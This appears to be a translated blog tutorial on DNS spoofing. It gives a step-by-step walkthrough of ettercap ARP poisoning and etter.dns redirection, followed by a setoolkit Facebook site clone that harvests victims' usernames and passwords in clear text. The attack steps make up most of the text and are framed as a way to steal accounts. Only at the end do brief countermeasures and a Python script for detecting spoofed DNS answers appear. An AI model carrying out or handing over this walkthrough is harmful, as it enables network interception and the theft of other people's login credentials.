I would like to briefly talk about DNS, the Domain Name System, which resolves domain names to IP addresses.
When you open a web browser and type facebook.com, the DNS system resolves that name to an IP address for you so that your computer can communicate and transmit data over the network.
This article will be divided into 2 parts:
Part 1: Using ettercap to perform DNS Spoofing
Part 2: Using Setoolkit and Ettercap to steal facebook accounts.
Procedure:
Part 1: Using ettercap to perform DNS Spoofing
First, I ping facebook.com to see which IP address the facebook.com domain name currently resolves to.
Next, on the Kali Linux machine, enable IP forwarding:
#echo 1 > /proc/sys/net/ipv4/ip_forward
Next edit the file etter.dns.
Use the command locate etter.dns to find where the file currently is. Then add the following records to it:
facebook.com A 192.168.0.109
*.facebook.com A 192.168.0.109
Here 192.168.0.109 is the IP address of the attacker machine.
Note: on Backtrack 5 versions the file may be located at /usr/local/share/ettercap/etter.dns
When done, save and exit with :wq
Perform DNS spoofing with the command
#ettercap -T -q -M arp:remote -P dns_spoof //
Then go to the client machine and renew its DHCP lease with the command >ipconfig /renew
Now, on the client PC, access facebook.com: you will see that it still loads normally. But when you ping facebook.com, the IP in the reply is 192.168.0.109, the attacker's IP.
OK. So you have succeeded in routing the client's traffic through your computer; now we will proceed to steal the Facebook account.
Part 2: Using setoolkit and ettercap to steal facebook accounts.
Tools used:
setoolkit: clone the website and capture the username/password
ettercap: scan hosts + ARP poisoning (ARP spoofing) + DNS spoofing + sniffing (eavesdropping).
Instructions with pictures
Start setoolkit
#/usr/share/set/setoolkit
Agree to the terms of use: type y -> Enter
Select 1) Social-Engineering Attacks
Select 2) Website Attack Vectors
Select 3) Credential Harvester Attack Method
Select 2) Site Cloner
Enter the attacker's IP address: 192.168.0.109
Enter the URL of the website you want to clone: https://www.facebook.com
When done, open another terminal and type ettercap -G to start ettercap in graphical mode and configure the interface
Select Sniff->Unified sniffing
Select the interface to sniff on: eth0
Select Hosts-> Scan for hosts
Host-> Hosts List
Choose the 2 addresses to sniff between (the client and the gateway)
Perform ARP poisoning (ARP spoofing)
Tick Sniff remote connections.
Edit /etc/ettercap/etter.dns and add these 2 lines:
facebook.com A 192.168.0.109
*.facebook.com A 192.168.0.109
Open Plugins-> Manage the plugins
Double-click dns_spoof to enable this plugin
Start sniffing
On the client computer, open a web browser, go to facebook.com and enter a username/password
setoolkit will capture this username/password
The username/password is displayed in clear text as shown above, so you now have the client's facebook account.
Updated on September 15, 2015:
In the new Kali 2.0 version, the cloned site is saved under the /var/www/ path; copy these files to the /var/www/html path and then proceed as normal:
Note: remember to change the permissions of these files so they are readable and writable:
#cd /var/www/html
#chmod 777 ./*
There are 3 files:
– index.html : the cloned facebook.com interface
– post.php: receives the username/password when it is entered and saves it to a harvester_*.txt file
– harvester_date_time.txt : stores the captured information.
In the same way you can steal many other kinds of accounts.
How to prevent DNS Spoofing:
In addition to the two countermeasures described in the ARP spoofing article, port security and Dynamic ARP Inspection (DAI), you should also deploy DHCP snooping to block rogue DHCP servers (DAI itself relies on the DHCP snooping binding table to know which IP/MAC pairs are legitimate).
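Besides the switch-side controls above, a host or monitoring box can detect the symptom this article produces: a public name like facebook.com answering with a LAN address such as 192.168.0.109, or with an answer the trusted resolver does not return. The script below is an added example, not code from the article; it assumes Cloudflare's public DNS-over-HTTPS endpoint as the reference resolver, and the sample answers in the __main__ block are constructed.

```python
import ipaddress
import json
import socket
import urllib.request

# Reference resolver reached over HTTPS, so an entry in a LAN attacker's
# etter.dns cannot influence its answers (assumption: outbound HTTPS works).
REFERENCE_DOH = "https://cloudflare-dns.com/dns-query"


def classify_answers(name, answers):
    """Flag A records for a public name that point into non-public space."""
    findings = []
    for a in answers:
        ip = ipaddress.ip_address(a)
        if ip.is_private or ip.is_loopback or ip.is_link_local:
            findings.append((a, f"{name} resolved to non-public address {a}"))
    return findings


def compare_with_reference(name, local_answers, reference_answers):
    """Return local answers that the reference resolver never returned."""
    return [a for a in local_answers if a not in set(reference_answers)]


def local_answers(name):
    """Resolve through the system resolver, the path a LAN DNS spoof affects."""
    return sorted({ai[4][0] for ai in socket.getaddrinfo(name, None, socket.AF_INET)})


def reference_answers(name):
    """Resolve through DoH; type 1 entries in the JSON 'Answer' list are A records."""
    req = urllib.request.Request(f"{REFERENCE_DOH}?name={name}&type=A",
                                 headers={"accept": "application/dns-json"})
    with urllib.request.urlopen(req, timeout=5) as resp:
        data = json.load(resp)
    return sorted(r["data"] for r in data.get("Answer", []) if r.get("type") == 1)


def check(name, local=None, reference=None):
    """Combine both checks; pass answer lists explicitly to run offline."""
    local = local_answers(name) if local is None else local
    reference = reference_answers(name) if reference is None else reference
    findings = classify_answers(name, local)
    for a in compare_with_reference(name, local, reference):
        findings.append((a, f"{name}: LAN resolver answer {a} not in reference set"))
    return findings


if __name__ == "__main__":
    # Constructed sample mirroring the article: spoofed LAN answer vs. a reference answer.
    for ip, reason in check("facebook.com", local=["192.168.0.109"], reference=["157.240.1.35"]):
        print("ALERT:", reason)
```

Run it with no arguments to `check` on a real client to compare the LAN resolver against the reference live; two findings for one answer (non-public address and mismatch) is exactly the fingerprint of the etter.dns records used above.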
P/s: As you have seen, once an attacker with bad intentions has gotten into our internal network, there are many tools for extracting information from the company. So if any employee intends to sabotage the company, it is quite difficult to investigate.
By the way, if you know of any useful monitoring tools or programs, please share them with me.
Close,